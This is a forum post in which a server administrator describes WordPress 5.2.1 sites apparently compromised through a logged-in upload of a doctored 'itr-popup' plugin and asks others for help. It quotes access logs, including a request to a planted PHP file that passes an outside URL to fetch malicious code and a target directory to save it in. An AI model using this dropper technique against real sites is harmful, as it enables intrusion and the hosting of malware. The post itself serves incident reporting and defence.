Different sites where hacked the same way on different servers

Hello there,

I’m managing some servers and I’ve figured out some WordPress sites (from different clients and different developers) are hacked a few days after their installations.

But, the hacking methods are completely similar to each other. This is what will happen:

1. A User logs into WordPress on his first try (seems that there is not any brute force attacks).
2. The logged in user uploads a plugin named itr-popup.

Here is the logs:

202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:

– url: Which is the url of a txt file that contains a malicious codes.
– dir: Where to save this malware on the victim site.

With this method, the hacker uploads any files he/she wants on the website and use them to hack other websites as well.

This is the logs of the way the hacker uploaded the scripts:

51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Both sites that this happened to them were using WordPress 5.2.1 and they made sure that they did not install this itr-popup plugin on their WordPress website.

Please note that they are different clients, different developers on different servers.

I even downloaded this plugin from WordPress repository and it was clean and itro-admin-scripts.php file which I said the hacker used it to upload malwares on the websites, is not included in the original version downloaded from WordPress.org. So, I believe that it’s not a problem with this plugin.

I didn’t find any similar attack reports on the internet. Anyone else having the same issue here? I worry if it’s some kind of a bug in WordPress 5.2.1 itself.

Thank you for your help.
Iman